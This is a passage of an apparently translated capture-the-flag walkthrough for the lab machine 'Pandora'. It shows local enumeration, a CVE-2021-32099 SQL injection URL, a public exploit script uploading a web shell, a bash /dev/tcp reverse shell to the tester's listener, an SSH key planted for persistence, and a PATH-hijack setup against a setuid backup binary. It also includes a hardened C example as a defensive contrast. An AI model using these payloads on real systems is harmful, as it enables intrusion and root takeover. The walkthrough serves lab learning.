echo "Configuring Pandora FMS elements and depending services"
sed "s/.*error_reporting =.*/error_reporting = E_ALL \& \~E_DEPRECATED \& \~E_NOTICE \& \~E_USER_WARNING/" /etc/php.ini > /tmp/php.ini && mv /tmp/php.ini /etc/php.ini
sed "s/.*max_execution_time =.*/max_execution_time = 0/" /etc/php.ini > /tmp/php.ini && mv /tmp/php.ini /etc/php.ini
sed "s/.*max_input_time =.*/max_input_time = -1/" /etc/php.ini > /tmp/php.ini && mv /tmp/php.ini /etc/php.ini
sed "s/.*upload_max_filesize =.*/upload_max_filesize = 800M/" /etc/php.ini > /tmp/php.ini && mv /tmp/php.ini /etc/php.ini
sed "s/.*memory_limit =.*/memory_limit = 500M/" /etc/php.ini > /tmp/php.ini && mv /tmp/php.ini /etc/php.ini
sed "s/.*post_max_size =.*/post_max_size = 100M/" /etc/php.ini > /tmp/php.ini && mv /tmp/php.ini /etc/php.ini

cd /var/www/html/pandora_console && mv -f install.php install.php.done

#Create the pandora user
/usr/sbin/useradd -d /home/pandora -s /bin/false -M -g 0 pandora

#Rock n' roll!
/etc/init.d/crond start &
/etc/init.d/ntpd start &

rm -rf /run/httpd/*
exec /usr/sbin/apachectl -D FOREGROUND
daniel@pandora:~$ cat /var/www/pandora/pandora_console/include/con
config.inc.php config.php config_process.php constants.php
daniel@pandora:~$ cat /var/www/pandora/pandora_console/include/config.
config.inc.php config.php
daniel@pandora:~$ cat /var/www/pandora/pandora_console/include/config.php
cat: /var/www/pandora/pandora_console/include/config.php: Permission denied
daniel@pandora:~$ ls -la /var/www/pandora/pandora_console/include/
total 4184
drwxr-xr-x 21 matt matt 4096 Dec 7 2021 .
drwxr-xr-x 16 matt matt 4096 Dec 7 2021 ..
drwxr-xr-x 2 matt matt 4096 Dec 7 2021 ajax
-rw-r--r-- 1 matt matt 10817 Jan 3 2020 api.php
drwxr-xr-x 3 matt matt 4096 Dec 7 2021 auth
drwxr-xr-x 2 matt matt 4096 Dec 7 2021 browscap
-rw-r--r-- 1 matt matt 83565 May 17 2019 calendar.js
-rw-r--r-- 1 matt matt 11133 Jan 3 2020 chart_generator.php
drwxr-xr-x 2 matt matt 4096 Dec 7 2021 class
-rw-r--r-- 1 matt matt 1208 Jan 3 2020 config.inc.php
-rw------- 1 matt matt 413 Dec 3 2021 config.php
-rw-r--r-- 1 matt matt 9455 Jan 3 2020 config_process.php
-rw-r--r-- 1 matt matt 20304 Jan 3 2020 constants.php
drwxr-xr-x 2 matt matt 4096 Dec 7 2021 db
drwxr-xr-x 5 matt matt 4096 Dec 7 2021 ehorus
drwxr-xr-x 2 matt matt 4096 Dec 7 2021 fonts
-rw-r--r-- 1 matt matt 103508 Jan 3 2020 functions_agents.php
-rw-r--r-- 1 matt matt 74014 Jan 3 2020 functions_alerts.php
-rw-r--r-- 1 matt matt 533199 Jan 3 2020 functions_api.php
-rw-r--r-- 1 matt matt 2268 Jan 3 2020 functions_categories.php
-rw-r--r-- 1 matt matt 8790 Jan 3 2020 functions_clippy.php
-rw-r--r-- 1 matt matt 2354 Jan 3 2020 functions_component_groups.php
-rw-r--r-- 1 matt matt 125584 Jan 3 2020 functions_config.php
-rw-r--r-- 1 matt matt 11772 Jan 3 2020 functions_container.php
-rw-r--r-- 1 matt matt 1296 Jan 3 2020 functions_credential_store.php
-rw-r--r-- 1 matt matt 24900 Jan 3 2020 functions_cron.php
-rw-r--r-- 1 matt matt 30834 Jan 3 2020 functions_custom_fields.php
-rw-r--r-- 1 matt matt 6141 Jan 3 2020 functions_custom_graphs.php
-rw-r--r-- 1 matt matt 62274 Jan 3 2020 functions_db.php
-rw-r--r-- 1 matt matt 2264 Jan 3 2020 functions_event_responses.php
-rw-r--r-- 1 matt matt 203093 Jan 3 2020 functions_events.php
-rw-r--r-- 1 matt matt 201815 Jan 3 2020 functions_events.php.orig
-rw-r--r-- 1 matt matt 2409 Jan 3 2020 functions_exportserver.php
-rw-r--r-- 1 matt matt 16339 Jan 3 2020 functions_extensions.php
-rw-r--r-- 1 matt matt 34154 Jan 3 2020 functions_filemanager.php
-rw-r--r-- 1 matt matt 7919 Jan 3 2020 functions_forecast.php
-rw-r--r-- 1 matt matt 55389 Jan 3 2020 functions_gis.php
-rw-r--r-- 1 matt matt 168692 Jan 3 2020 functions_graph.php
-rw-r--r-- 1 matt matt 92604 Jan 3 2020 functions_groups.php
-rw-r--r-- 1 matt matt 7988 Jan 3 2020 functions_groupview.php
-rw-r--r-- 1 matt matt 116612 Jan 3 2020 functions_html.php
-rw-r--r-- 1 matt matt 12608 Jan 3 2020 functions_incidents.php
-rw-r--r-- 1 matt matt 12627 Jan 3 2020 functions_integriaims.php
-rw-r--r-- 1 matt matt 15493 Jan 3 2020 functions_io.php
-rw-r--r-- 1 matt matt 12782 Jan 3 2020 functions_maps.php
-rw-r--r-- 1 matt matt 27255 Jan 3 2020 functions_menu.php
-rw-r--r-- 1 matt matt 17310 Jan 3 2020 functions_messages.php
-rw-r--r-- 1 matt matt 4058 Jan 3 2020 functions_migration.php
-rw-r--r-- 1 matt matt 95770 Jan 3 2020 functions_modules.php
-rw-r--r-- 1 matt matt 51687 Jan 3 2020 functions_netflow.php
-rw-r--r-- 1 matt matt 16692 Jan 3 2020 functions_network_components.php
-rw-r--r-- 1 matt matt 73983 Jan 3 2020 functions_networkmap.php
-rw-r--r-- 1 matt matt 1229 Jan 3 2020 functions_networkmaps.php
-rw-r--r-- 1 matt matt 8151 Jan 3 2020 functions_network.php
-rw-r--r-- 1 matt matt 2230 Jan 3 2020 functions_network_profiles.php
-rw-r--r-- 1 matt matt 27613 Jan 3 2020 functions_notifications.php
-rw-r--r-- 1 matt matt 2361 Jan 3 2020 functions_os.php
-rw-r--r-- 1 matt matt 1229 Jan 3 2020 functions_pandora_networkmap.php
-rw-r--r-- 1 matt matt 154858 Jan 3 2020 functions.php
-rw-r--r-- 1 matt matt 35615 Jan 3 2020 functions_planned_downtimes.php
-rw-r--r-- 1 matt matt 2148 Jan 3 2020 functions_post_process.php
-rw-r--r-- 1 matt matt 9110 Jan 3 2020 functions_profile.php
-rw-r--r-- 1 matt matt 181908 Jan 3 2020 functions_reporting_html.php
-rw-r--r-- 1 matt matt 418051 Jan 3 2020 functions_reporting.php
-rw-r--r-- 1 matt matt 2381 Jan 3 2020 functions_reporting_xml.php
-rw-r--r-- 1 matt matt 23179 Jan 3 2020 functions_reports.php
-rw-r--r-- 1 matt matt 40701 Jan 3 2020 functions_servers.php
-rw-r--r-- 1 matt matt 32871 Jan 3 2020 functions_snmp_browser.php
-rw-r--r-- 1 matt matt 12954 Jan 3 2020 functions_snmp.php
-rw-r--r-- 1 matt matt 18055 Jan 3 2020 functions_tactical.php
-rw-r--r-- 1 matt matt 81748 Jan 3 2020 functions_tags.php
-rw-r--r-- 1 matt matt 2040 Jan 3 2020 functions_themes.php
-rw-r--r-- 1 matt matt 31058 Jan 3 2020 functions_treeview.php
-rw-r--r-- 1 matt matt 182399 Jan 3 2020 functions_ui.php
-rw-r--r-- 1 matt matt 3871 Jan 3 2020 functions_ui_renders.php
-rw-r--r-- 1 matt matt 60177 Jan 3 2020 functions_update_manager.php
-rw-r--r-- 1 matt matt 33529 Dec 2 2021 functions_users.php
-rw-r--r-- 1 matt matt 65797 Jan 3 2020 functions_visual_map_editor.php
-rw-r--r-- 1 matt matt 173714 Jan 3 2020 functions_visual_map.php
-rw-r--r-- 1 matt matt 7910 Jan 3 2020 functions_wmi.php
-rw-r--r-- 1 matt matt 2098 Jan 3 2020 get_file.php
-rw-r--r-- 1 matt matt 9272 Jan 3 2020 gettext.php
drwxr-xr-x 4 matt matt 4096 Dec 7 2021 graphs
drwxr-xr-x 6 matt matt 4096 Dec 7 2021 help
drwxr-xr-x 2 matt matt 4096 Dec 7 2021 ics-parser
drwxr-xr-x 2 matt matt 4096 Dec 7 2021 Image
-rw-r--r-- 1 matt matt 1322 Jan 3 2020 include_graph_dependencies.php
drwxr-xr-x 8 matt matt 4096 Dec 7 2021 javascript
drwxr-xr-x 3 matt matt 4096 Dec 7 2021 languages
drwxr-xr-x 2 matt matt 4096 Dec 7 2021 lib
-rw-r--r-- 1 matt matt 4842 Jan 3 2020 load_session.php
-rw-r--r-- 1 matt matt 1177 Jan 3 2020 php_to_js_values.php
drwxr-xr-x 3 matt matt 4096 Dec 7 2021 rest-api
drwxr-xr-x 2 matt matt 4096 Dec 7 2021 sounds
-rw-r--r-- 1 matt matt 6152 May 17 2019 streams.php
drwxr-xr-x 4 matt matt 4096 Dec 7 2021 styles
drwxr-xr-x 2 matt matt 4096 Dec 7 2021 templates
-rw-r--r-- 1 matt matt 637 Jan 3 2020 test.js
drwxr-xr-x 2 matt matt 4096 Dec 7 2021 visual-console-client
-rw-r--r-- 1 matt matt 2640 Jan 3 2020 web2image.js
-rw-r--r-- 1 matt matt 5523 Jan 3 2020 websocket_registrations.php
daniel@pandora:~$ ls -lah /etc/apache2/sites-available/
total 24K
drwxr-xr-x 2 root root 4.0K Dec 7 2021 .
drwxr-xr-x 8 root root 4.0K Dec 7 2021 ..
-rw-r--r-- 1 root root 1.4K Apr 13 2020 000-default.conf
-rw-r--r-- 1 root root 6.2K Apr 13 2020 default-ssl.conf
-rw-r--r-- 1 root root 315 Dec 3 2021 pandora.conf
daniel@pandora:~$ cat /etc/apache2/sites-available/pandora.conf
<VirtualHost localhost:80>
ServerAdmin admin@panda.htb
ServerName pandora.panda.htb
DocumentRoot /var/www/pandora
AssignUserID matt matt
<Directory /var/www/pandora>
AllowOverride All
</Directory>
ErrorLog /var/log/apache2/error.log
CustomLog /var/log/apache2/access.log combined
</VirtualHost>
daniel@pandora:~$ curl http://localhost/
<meta HTTP-EQUIV="REFRESH" content="0; url=/pandora_console/">
daniel@pandora:~$ find /var/www/pandora/ -writable
daniel@pandora:~$

15. That yielded nothing either; the only finding is that the Apache config suggests another service on port 80 bound to localhost. Confirm it with ss:

daniel@pandora:~$ ss -ltn
State Recv-Q Send-Q Local Address:Port Peer Address:Port Process
LISTEN 0 4096 127.0.0.53%lo:53 0.0.0.0:*
LISTEN 0 128 0.0.0.0:22 0.0.0.0:*
LISTEN 0 80 127.0.0.1:3306 0.0.0.0:*
LISTEN 0 511 *:80 *:*
LISTEN 0 128 [::]:22 [::]:*
daniel@pandora:~$

16. Forward that port out over SSH with a local port forward and take a look at the site.

┌──(kali㉿kali)-[~/桌面]
└─$ ssh -L 80:127.0.0.1:80 daniel@10.10.11.136

daniel@10.10.11.136's password:
Welcome to Ubuntu 20.04.3 LTS (GNU/Linux 5.4.0-91-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage

System information as of Wed 27 Dec 03:26:41 UTC 2023

System load: 0.0
Usage of /: 63.1% of 4.87GB
Memory usage: 9%
Swap usage: 0%
Processes: 226
Users logged in: 1
IPv4 address for eth0: 10.10.11.136
IPv6 address for eth0: dead:beef::250:56ff:feb9:af3

=> /boot is using 91.8% of 219MB

0 updates can be applied immediately.

The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings

Last login: Wed Dec 27 03:13:18 2023 from 10.10.14.3
daniel@pandora:~$

17. Now browse the forwarded site from the local machine.

18. Looking around the site, we find the following version information:

Pandora FMS

v7.0NG.742_FIX_PERL2020

19. Search Google for vulnerabilities affecting this version.

20. Several relevant results come up:

exploit-CVE-2020-5844

index.php?sec=godmode/extensions&sec2=extensions/files_repo: in Pandora FMS v7.0 NG, an authenticated administrator can upload malicious PHP scripts and execute them via Base64 decoding of the file location. This affects v7.0NG.742_FIX_PERL2020.

https://www.sonarsource.com/blog/pandora-fms-742-critical-code-vulnerabilities-explained/

While analysing the Pandora FMS 742 console, the SonarSource researchers found the following code vulnerabilities:

SQL injection (pre-authentication) (CVE-2021-32099)
Phar deserialization (pre-authentication) (CVE-2021-32098)
Remote file inclusion (lowest-privilege user) (CVE-2021-32100)
Cross-site request forgery (CSRF)

https://sploitus.com/exploit?id=100B9151-5B50-532E-BF69-74864F32DB02

https://github.com/l3eol3eo/CVE-2021-32099_SQLi

POC:
http://localhost:80/pandora_console/include/chart_generator.php?session_id=PayloadHere%27%20union%20select%20%271%27,%272%27,%27id_usuario|s:5:%22admin%22;%27%20--%20a => Pandora FMS Graph ( - )

reload: http://localhost:8000/pandora_console/ to access webpage

21. Using the CVE-2021-32099 SQL injection (CVE-2021-32099_SQLi), we are logged straight into the console back end:

http://localhost:80/pandora_console/include/chart_generator.php?session_id=PayloadHere%27%20union%20select%20%271%27,%272%27,%27id_usuario|s:5:%22admin%22;%27%20--%20a

http://localhost:8000/pandora_console/

22. We are now in the console's admin pages, but exploitation has to continue from here. This is where the CVE-2020-5844 vulnerability found earlier via Baidu comes in; it needs an exploit script, and searchsploit already carries one.

┌──(kali㉿kali)-[~/桌面]
└─$ searchsploit Pandora FMS 7.0 NG 742
------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Pandora FMS v7.0NG.742 - Remote Code Execution (RCE) (Authenticated) | php/webapps/50961.py
------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

23. Copy the script locally.

┌──(kali㉿kali)-[~/桌面]
└─$ searchsploit -m php/webapps/50961.py
Exploit: Pandora FMS v7.0NG.742 - Remote Code Execution (RCE) (Authenticated)
URL: https://www.exploit-db.com/exploits/50961
Path: /usr/share/exploitdb/exploits/php/webapps/50961.py
Codes: CVE-2020-5844
Verified: False
File Type: Python script, ASCII text executable, with very long lines (1384)
Copied to: /home/kali/桌面/50961.py

24. Run it to see the usage.

┌──(kali㉿kali)-[~/桌面]
└─$ python3 50961.py
UNICORD Exploit for CVE-2020-5844 (Pandora FMS v7.0NG.742) - Remote Code Execution

Usage:
python3 exploit-CVE-2020-5844.py -t <target-IP> <target-port> -u <username> <password>
python3 exploit-CVE-2020-5844.py -t <target-IP> <target-port> -p <PHPSESSID>
python3 exploit-CVE-2020-5844.py -t <target-IP> <target-port> -p <PHPSESSID> [-c <custom-command>]
python3 exploit-CVE-2020-5844.py -t <target-IP> <target-port> -p <PHPSESSID> [-s <local-ip> <local-port>]
python3 exploit-CVE-2020-5844.py -t <target-IP> <target-port> -p <PHPSESSID> [-w <name.php>]
python3 exploit-CVE-2020-5844.py -h

Options:
-t Target host and port. Provide target IP address and port.
-u Target username and password. Provide username and password to log in to Pandora FMS.
-p Target valid PHP session ID. No username or password needed. (Optional)
-s Reverse shell mode. Provide local IP address and port. (Optional)
-c Custom command mode. Provide command to execute. (Optional)
-w Web shell custom mode. Provide custom PHP file name. (Optional)
-h Show this help menu.

23. The script needs a valid session; grab the PHPSESSID cookie from the browser session obtained above:

07ginjuage5gp37lqlualmfpah

24. Now run the script in web shell mode to upload a web shell.

┌──(kali㉿kali)-[~/桌面]
└─$ python3 50961.py -t 127.0.0.1 80 -p 07ginjuage5gp37lqlualmfpah
_ __,~~~/_ __ ___ _______________ ___ ___
,~~`( )_( )-\| / / / / |/ / _/ ___/ __ \/ _ \/ _ \
|/| `--. / /_/ / // // /__/ /_/ / , _/ // /
_V__v___!_!__!_____V____\____/_/|_/___/\___/\____/_/|_/____/....

UNICORD: Exploit for CVE-2020-5844 (Pandora FMS v7.0NG.742) - Remote Code Execution
OPTIONS: Web Shell Mode
PHPSESS: 07ginjuage5gp37lqlualmfpah
WEBFILE: unicord.php
WEBSITE: http://127.0.0.1:80/pandora_console
EXPLOIT: Connected to website! Status Code: 200
EXPLOIT: Logged into Pandora FMS!
EXPLOIT: Web shell uploaded!
SUCCESS: Web shell available at: http://127.0.0.1:80/pandora_console/images/unicord.php?cmd=whoami

25. We now have a web shell on the site. Next, build a reverse shell payload and request it through the web shell to get an interactive shell.

Visit:
127.0.0.1/pandora_console/images/unicord.php?cmd=bash%20-c%20%22bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F10.10.14.3%2F10086%200%3E%261%22

26. The listener catches the connection, and we read the first flag.

┌──(kali㉿kali)-[~/桌面]
└─$ nc -lvnp 10086
listening on [any] 10086 ...
connect to [10.10.14.3] from (UNKNOWN) [10.10.11.136] 34152
bash: cannot set terminal process group (937): Inappropriate ioctl for device
bash: no job control in this shell
matt@pandora:/var/www/pandora/pandora_console/images$

matt@pandora:/var/www/pandora/pandora_console/images$ cat /home/matt/user.txt
cat /home/matt/user.txt
3b035facfdc16f5a6f5414e27d851381
matt@pandora:/var/www/pandora/pandora_console/images$

0x02 Obtaining system privileges

27. For convenience in the following steps, place our local public key in the matt user's authorized_keys on the target.

matt@pandora:/var/www/pandora/pandora_console/images$ cd ~
cd ~
matt@pandora:/home/matt$ ls
ls
user.txt
matt@pandora:/home/matt$ mkdir .ssh
mkdir .ssh
matt@pandora:/home/matt$ echo "ssh-rsa AAAAB3NKBQAEEmopirH5MZzROwVXA3 kali@kali" > /home/matt/.ssh/authorized_keys
<OwVXA3 kali@kali" > /home/matt/.ssh/authorized_keys
matt@pandora:/home/matt$

28. Log in over SSH with the key.

┌──(kali㉿kali)-[~/桌面]
└─$ ssh matt@10.10.11.136 -i ../.ssh/id_rsa
Welcome to Ubuntu 20.04.3 LTS (GNU/Linux 5.4.0-91-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage

System information as of Wed 27 Dec 06:25:01 UTC 2023

System load: 0.0
Usage of /: 63.3% of 4.87GB
Memory usage: 15%
Swap usage: 0%
Processes: 237
Users logged in: 0
IPv4 address for eth0: 10.10.11.136
IPv6 address for eth0: dead:beef::250:56ff:feb9:af3

=> /boot is using 91.8% of 219MB

0 updates can be applied immediately.

The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

matt@pandora:~$

29. Listing SUID binaries on the host reveals a backup program that only root and the matt group may run.

matt@pandora:/home/matt$ find / -perm -4000 -ls 2>/dev/null
find / -perm -4000 -ls 2>/dev/null
264644 164 -rwsr-xr-x 1 root root 166056 Jan 19 2021 /usr/bin/sudo
265010 32 -rwsr-xr-x 1 root root 31032 May 26 2021 /usr/bin/pkexec
267386 84 -rwsr-xr-x 1 root root 85064 Jul 14 2021 /usr/bin/chfn
262764 44 -rwsr-xr-x 1 root root 44784 Jul 14 2021 /usr/bin/newgrp
267389 88 -rwsr-xr-x 1 root root 88464 Jul 14 2021 /usr/bin/gpasswd
264713 40 -rwsr-xr-x 1 root root 39144 Jul 21 2020 /usr/bin/umount
262929 20 -rwsr-x--- 1 root matt 16816 Dec 3 2021 /usr/bin/pandora_backup
267390 68 -rwsr-xr-x 1 root root 68208 Jul 14 2021 /usr/bin/passwd
264371 56 -rwsr-xr-x 1 root root 55528 Jul 21 2020 /usr/bin/mount
264643 68 -rwsr-xr-x 1 root root 67816 Jul 21 2020 /usr/bin/su
264040 56 -rwsr-sr-x 1 daemon daemon 55560 Nov 12 2018 /usr/bin/at
264219 40 -rwsr-xr-x 1 root root 39144 Mar 7 2020 /usr/bin/fusermount
267387 52 -rwsr-xr-x 1 root root 53040 Jul 14 2021 /usr/bin/chsh
262815 464 -rwsr-xr-x 1 root root 473576 Jul 23 2021 /usr/lib/openssh/ssh-keysign
264920 52 -rwsr-xr-- 1 root messagebus 51344 Jun 11 2020 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
264927 16 -rwsr-xr-x 1 root root 14488 Jul 8 2019 /usr/lib/eject/dmcrypt-get-device
266611 24 -rwsr-xr-x 1 root root 22840 May 26 2021 /usr/lib/policykit-1/polkit-agent-helper-1

30. Run it on the host.

matt@pandora:~$ 
matt@pandora:~$ pandora_backup
PandoraFMS Backup Utility
Now attempting to backup PandoraFMS client
tar: Removing leading `/' from member names
/var/www/pandora/pandora_console/AUTHORS
tar: Removing leading `/' from hard link targets
/var/www/pandora/pandora_console/COPYING
/var/www/pandora/pandora_console/DB_Dockerfile
/var/www/pandora/pandora_console/DEBIAN/
/var/www/pandora/pandora_console/DEBIAN/md5sums
/var/www/pandora/pandora_console/DEBIAN/conffiles
/var/www/pandora/pandora_console/DEBIAN/control
/var/www/pandora/pandora_console/DEBIAN/make_deb_package.sh
/var/www/pandora/pandora_console/DEBIAN/postinst
/var/www/pandora/pandora_console/Dockerfile
/var/www/pandora/pandora_console/ajax.php
/var/www/pandora/pandora_console/attachment/
/var/www/pandora/pandora_console/attachment/.htaccess
/var/www/pandora/pandora_console/attachment/downloads/
/var/www/pandora/pandora_console/attachment/downloads/.gitignore
/var/www/pandora/pandora_console/attachment/plugin/
/var/www/pandora/pandora_console/attachment/plugin/index.html
/var/www/pandora/pandora_console/attachment/files_repo/
/var/www/pandora/pandora_console/attachment/pandora_chat.global_counter.txt
/var/www/pandora/pandora_console/attachment/.cron.supervisor.servers.idx
/var/www/pandora/pandora_console/attachment/mibs/
/var/www/pandora/pandora_console/attachment/mibs/index.html
/var/www/pandora/pandora_console/attachment/index.html
................
/var/www/pandora/pandora_console/vendor/egulias/email-validator/composer.json
/var/www/pandora/pandora_console/vendor/egulias/email-validator/phpunit.xml.dist
/var/www/pandora/pandora_console/vendor/egulias/email-validator/LICENSE
/var/www/pandora/pandora_console/ws.php
Backup successful!
Terminating program!
matt@pandora:~$

31. It performs a backup: a long list of paths, all under /var/www/pandora. The tar messages at the top show that it uses tar to create the archive.

32. Download the binary and inspect it locally with strings.

matt@pandora:~$ file /usr/bin/pandora_backup
/usr/bin/pandora_backup: setuid ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=7174c3b04737ad11254839c20c8dab66fce55af8, for GNU/Linux 3.2.0, not stripped
matt@pandora:~$
matt@pandora:~$ file /usr/bin/pandora_backup
/usr/bin/pandora_backup: setuid ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=7174c3b04737ad11254839c20c8dab66fce55af8, for GNU/Linux 3.2.0, not stripped
matt@pandora:~$ python3 -m http.server -d /usr/bin/ 9001
Serving HTTP on 0.0.0.0 port 9001 (http://0.0.0.0:9001/) ...
10.10.14.3 - - [27/Dec/2023 06:30:36] "GET /pandora_backup HTTP/1.1" 200 -
^C
Keyboard interrupt received, exiting.
matt@pandora:~$

┌──(kali㉿kali)-[~/桌面]
└─$ wget http://10.10.11.136:9001/pandora_backup
--2023-12-27 14:30:36-- http://10.10.11.136:9001/pandora_backup
正在连接 10.10.11.136:9001... 已连接。
已发出 HTTP 请求,正在等待回应... 200 OK
长度:16816 (16K) [application/octet-stream]
正在保存至: “pandora_backup”

pandora_backup 100%[===========================================================================>] 16.42K 53.7KB/s 用时 0.3s

2023-12-27 14:30:37 (53.7 KB/s) - 已保存 “pandora_backup” [16816/16816])

┌──(kali㉿kali)-[~/桌面]
└─$ ls
50961.py pandora_backup reports

┌──(kali㉿kali)-[~/桌面]
└─$ strings pandora_backup
/lib64/ld-linux-x86-64.so.2
puts
setreuid
system
getuid
geteuid
__cxa_finalize
__libc_start_main
libc.so.6
GLIBC_2.2.5
_ITM_deregisterTMCloneTable
__gmon_start__
_ITM_registerTMCloneTable
u/UH
[]A\A]A^A_
PandoraFMS Backup Utility
Now attempting to backup PandoraFMS client
tar -cvf /root/.backup/pandora-backup.tar.gz /var/www/pandora/pandora_console/*
Backup failed!
Check your permissions!
Backup successful!
Terminating program!
;*3$"
GCC: (Debian 10.2.1-6) 10.2.1 20210110
crtstuff.c
deregister_tm_clones
__do_global_dtors_aux
completed.0
__do_global_dtors_aux_fini_array_entry
frame_dummy
__frame_dummy_init_array_entry
backup.c
__FRAME_END__
__init_array_end
_DYNAMIC
__init_array_start
__GNU_EH_FRAME_HDR
_GLOBAL_OFFSET_TABLE_
__libc_csu_fini
_ITM_deregisterTMCloneTable
puts@GLIBC_2.2.5
_edata
getuid@GLIBC_2.2.5
system@GLIBC_2.2.5
geteuid@GLIBC_2.2.5
__libc_start_main@GLIBC_2.2.5
__data_start
__gmon_start__
__dso_handle
_IO_stdin_used
__libc_csu_init
setreuid@GLIBC_2.2.5
__bss_start
main
__TMC_END__
_ITM_registerTMCloneTable
__cxa_finalize@GLIBC_2.2.5
.symtab
.strtab
.shstrtab
.interp
.note.gnu.build-id
.note.ABI-tag
.gnu.hash
.dynsym
.dynstr
.gnu.version
.gnu.version_r
.rela.dyn
.rela.plt
.init
.plt.got
.text
.fini
.rodata
.eh_frame_hdr
.eh_frame
.init_array
.fini_array
.dynamic
.got.plt
.data
.bss
.comment

┌──(kali㉿kali)-[~/桌面]
└─$

33. The tar command is invoked without an absolute path, which means we can escalate to root via PATH environment variable injection!

Because tar is not given a path, system() hands the command to a shell, which resolves tar through the calling user's PATH environment variable to find an executable to run. We control that variable, so the lookup is vulnerable to path hijacking. The strings output also shows setreuid, so the binary sets its real uid to root before calling system(); that is why the shell spawned in tar's place keeps uid 0 (the gid stays matt, as the id output below confirms).

Prepend a directory we control under /tmp to our PATH:

echo $PATH

export PATH=/tmp/test:$PATH

echo $PATH
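For contrast, here is how a privileged helper of this kind avoids the PATH hijack. This is an added example written for this writeup, not code from the author or from Pandora FMS: it reconstructs the same backup step the binary performs (archive /var/www/pandora/pandora_console into /root/.backup), but runs tar by absolute path with fork+execve and a fixed environment, so neither PATH nor any other caller-controlled variable is consulted. It assumes tar lives at /usr/bin/tar and that /bin/sh exists for the self-checks; the function names are the example's own.

```c
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Assumed location of tar; pandora_backup looked it up via PATH instead. */
#define TAR_PATH "/usr/bin/tar"

/* The only environment the child ever sees. Whatever the caller exported
 * (PATH=/tmp/test:..., LD_PRELOAD, TAR_OPTIONS, ...) is discarded. */
static char *const MINIMAL_ENV[] = { "PATH=/usr/bin:/bin", NULL };

/* A privileged program should only exec helpers by absolute path. */
int is_absolute_path(const char *p)
{
    return p != NULL && p[0] == '/';
}

/* Fork and execve `prog` with argv and the fixed environment above.
 * Returns the child's exit status, or -1 on error. No shell is involved,
 * so there is no word splitting, no globbing and no PATH search. */
int run_fixed_env(const char *prog, char *const argv[])
{
    if (!is_absolute_path(prog)) {
        errno = EINVAL;
        return -1;
    }
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        execve(prog, argv, MINIMAL_ENV);
        _exit(127); /* only reached if exec failed */
    }
    int status;
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

/* Hardened equivalent of the backup the binary performs: same archive,
 * same source tree, but tar is named by absolute path and the directory
 * is passed as one argument instead of a shell-expanded wildcard. */
int backup_pandora(const char *archive, const char *srcdir)
{
    char *const argv[] = { "tar", "-cf", (char *)archive, (char *)srcdir, NULL };
    return run_fixed_env(TAR_PATH, argv);
}

/* Self-checks: run /bin/sh (assumed present) through the same wrapper
 * and report what the child actually saw. */
int demo_exit_status(void)
{
    char *const argv[] = { "sh", "-c", "exit 3", NULL };
    return run_fixed_env("/bin/sh", argv); /* child's status, 3 */
}

int demo_env_is_minimal(void)
{
    char *const argv[] = { "sh", "-c",
        "[ \"$PATH\" = /usr/bin:/bin ] && [ -z \"$LD_PRELOAD\" ]", NULL };
    return run_fixed_env("/bin/sh", argv) == 0; /* 1 when the env is ours */
}

int demo_relative_prog_rejected(void)
{
    char *const argv[] = { "tar", "--version", NULL };
    return run_fixed_env("tar", argv) == -1; /* 1: bare name refused */
}

int main(void)
{
    printf("exit status passthrough: %d\n", demo_exit_status());
    printf("child env is minimal:    %d\n", demo_env_is_minimal());
    printf("relative program refused: %d\n", demo_relative_prog_rejected());
    /* In the real helper this would be the only call made:
     * backup_pandora("/root/.backup/pandora-backup.tar.gz",
     *                "/var/www/pandora/pandora_console"); */
    return 0;
}
```

The three changes that matter are the absolute program path, the fixed environment passed to execve, and the absence of system(): with those in place, a writable directory prepended to PATH, as done in the next step, has no effect on what the setuid process runs.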

34. Set up the PATH variable and the fake tar.

matt@pandora:~$ ls -la /tmp
total 52
drwxrwxrwt 13 root root 4096 Dec 27 06:09 .
drwxr-xr-x 18 root root 4096 Dec 7 2021 ..
drwxrwxrwt 2 root root 4096 Dec 27 01:06 .font-unix
drwxrwxrwt 2 root root 4096 Dec 27 01:06 .ICE-unix
drwx------ 3 root root 4096 Dec 27 01:06 systemd-private-062d5d900bcf45168ea97553a0cb3f56-apache2.service-xIYOKi
drwx------ 3 root root 4096 Dec 27 01:06 systemd-private-062d5d900bcf45168ea97553a0cb3f56-systemd-logind.service-jawnUh
drwx------ 3 root root 4096 Dec 27 01:06 systemd-private-062d5d900bcf45168ea97553a0cb3f56-systemd-resolved.service-Rdzmth
drwx------ 3 root root 4096 Dec 27 01:06 systemd-private-062d5d900bcf45168ea97553a0cb3f56-systemd-timesyncd.service-prnntj
drwx------ 3 root root 4096 Dec 27 01:30 systemd-private-062d5d900bcf45168ea97553a0cb3f56-upower.service-aJrvDh
drwxrwxrwt 2 root root 4096 Dec 27 01:06 .Test-unix
drwx------ 2 root root 4096 Dec 27 01:06 vmware-root_711-4256610694
drwxrwxrwt 2 root root 4096 Dec 27 01:06 .X11-unix
drwxrwxrwt 2 root root 4096 Dec 27 01:06 .XIM-unix
matt@pandora:~$ cd tmp
-bash: cd: tmp: No such file or directory
